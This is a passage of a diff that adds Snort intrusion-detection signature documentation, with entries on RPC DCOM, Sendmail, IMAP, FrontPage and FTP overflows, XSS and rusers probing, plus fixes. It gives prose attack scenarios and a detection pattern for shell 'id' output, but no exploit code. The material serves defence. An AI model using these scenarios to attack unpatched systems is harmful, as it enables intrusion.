+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3254.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3254
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1212.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1212
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running on a web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Attrition:
+http://www.attrition.org/security/advisory/misc/ecom-990420
+
+--
--- /dev/null
+++ b/doc/signatures/1688.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1688
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3191.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3191
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1883.txt
@@ -0,0 +1,65 @@
+Rule:
+
+
+--
+Sid:
+
+1883
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(nobody)" is an output of an "id" command indicating that the user
+has "nobody" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Attack Scenarios: 
+
+a buffer overflow exploit against the WWW server results in "/bin/sh" being executed. An automated script performing an attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives: 
+
+the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: 
+
+not known
+
+-- 
+Corrective Action: 
+
+investigate the server for signs of compromise, run the integrity checking software, look for other IDS alerts involving the same IP addresses.
+
+--
+Contributors: 
+
+Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/961.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+961
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
--- /dev/null
+++ b/doc/signatures/2262.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2262
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
--- /dev/null
+++ b/doc/signatures/1301.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1301
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2106.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2106
+
+--
+Summary:
+This event is generated when a remote user sends an IMAP LSUB command
+with invalid data to port 143 on an internal server. This may indicate
+an attempt to exploit a buffer overflow vulnerability in the IMAP LSUB
+command. This vulnerability may affect other IMAP implementations.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+LSUB command, a buffer overflow condition may occur. This can allow the
+attacker to access the shell, where arbitrary code can be executed. Note
+that this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264. 
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LSUB command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulneratility Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1110
+
+CVE
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2000-0284 
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10374
+
+--
--- /dev/null
+++ b/doc/signatures/1995.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1995
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/584.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+584
+
+--
+Summary:
+This event is generated when an attempt is made to probe a host for the
+rusers RPC service.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+The rusers RPC service is used to remotely list all logged in users on a
+machine. This information may be useful to an attacker when targeting a
+remote host.
+
+--
+Affected Systems:
+	All systems running the rusers RPC service
+ 
+--
+Attack Scenarios:
+An attacker runs a vulnerability assessment tool, or the standard Unix
+rusers command.  The attacker may use information gleaned from this to
+better target his attacks.
+
+--
+Ease of Attack:
+Simple. Tools to probe the rusers service come standard with most Unix variants.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rusers service.
+
+Disallow access to RPC services from hosts external to the protected
+network
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1595.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1595
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with FrontPage Server Extension software.
+
+--
+Impact:
+Remote access.  This attack may permit exeuction of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft FrontPage 97 and 98 Server Extensions are shipped with htimage.exe and imagemap.exe files that provide image-mapping support on the server for legacy browsers.  There is a vulnerability associated with the htimage.exe file because of unchecked buffers that may permit execution of arbitrary code on the vulnerable server. 
+
+--
+Affected Systems:
+Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4
+
+--
+Attack Scenarios:
+An attacker can craft a special URL referencing the htimage.exe file that causes a buffer overflow, allowing execution of arbitrary commands on the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the htimage.exe and imagemap.exe files from the server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10376
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0256
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0122
+
+Bugtraq
+http://www.securityfocus.com/bid/1117
+
+--
--- /dev/null
+++ b/doc/signatures/1510.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1510
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000153.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000153
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/1878.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1878
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1734.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1734
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow or denial of service vulnerability associated with FTP USER command. 
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a
+denial of service or allow remote execution of arbitrary commands with
+privileges of the process running the FTP server. 
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit various
+vulnerabilities associated with the FTP USER command of different FTP
+servers. It is possible to cause a denial of service attack or gain
+remote access to execute arbitrary commands with the privileges of the
+process running the FTP server by sending an overly long argument with
+the FTP USER command. 
+
+--
+Affected Systems:
+	bftpd 1.0.11.
+	BlackMoon FTP Server 1.0 through 1.5. 
+	CesarFTPD 0.98b. 
+	A-FTP Anonymous FTP Server.
+	Argosoft FRP server 1.0.
+	TYPSoft FTP Server 0.78. 
+	AnalogX proxy server 4.04 and earlier 
+	Dragon FTP server.
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the USER
+command, causing a denial of service or buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2531.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2531
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000838.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000838
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "PhotoCycle" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "phppage" parameter in the "photocycle.php" script used by the "PhotoCycle" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PhotoCycle
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/285.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+285
+
+--
+Summary:
+This event generated when an attempt is made to exploit a buffer overflow in the pop2 service.
+
+--
+Impact: 
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable host with the privileges of the user "nobody".
+
+--
+Detailed Information:
+Access to the user "nobody" can be obtained with pop2 or pop3 servers that support "anonymous proxy".  "Anonymous proxy" permits the use of a proxy pop server to access mail on another pop server where the user has a valid account.  This access to the proxy server as user "nobody".  A buffer overflow exists because of improper user input filtering, allowing the attacker to enter an overly long argment to the FOLD command.  This may permit the execution of arbitrary commands on the vulernable server with the privileges of the user "nobody".
+
+--
+Affected Systems:
+Debian Linux 2.1
+Redhat Linux 4.2, 5.0, 5.1, and 5.2
+University of Washington imap 4.4
+University of Washington pop2d 4.4
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable pop2 server, permitting the execution of arbitrary commands with the privilege of user "nobody". 
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the pop2d version 4.51 or later. 
+
+Compile pop2d to not support anonymous proxing.
+
+--
+Contributors:
+Original rule writer unknown
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/283
+
+
+--
--- /dev/null
+++ b/doc/signatures/3372.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3372
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3065.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3065
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"append" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
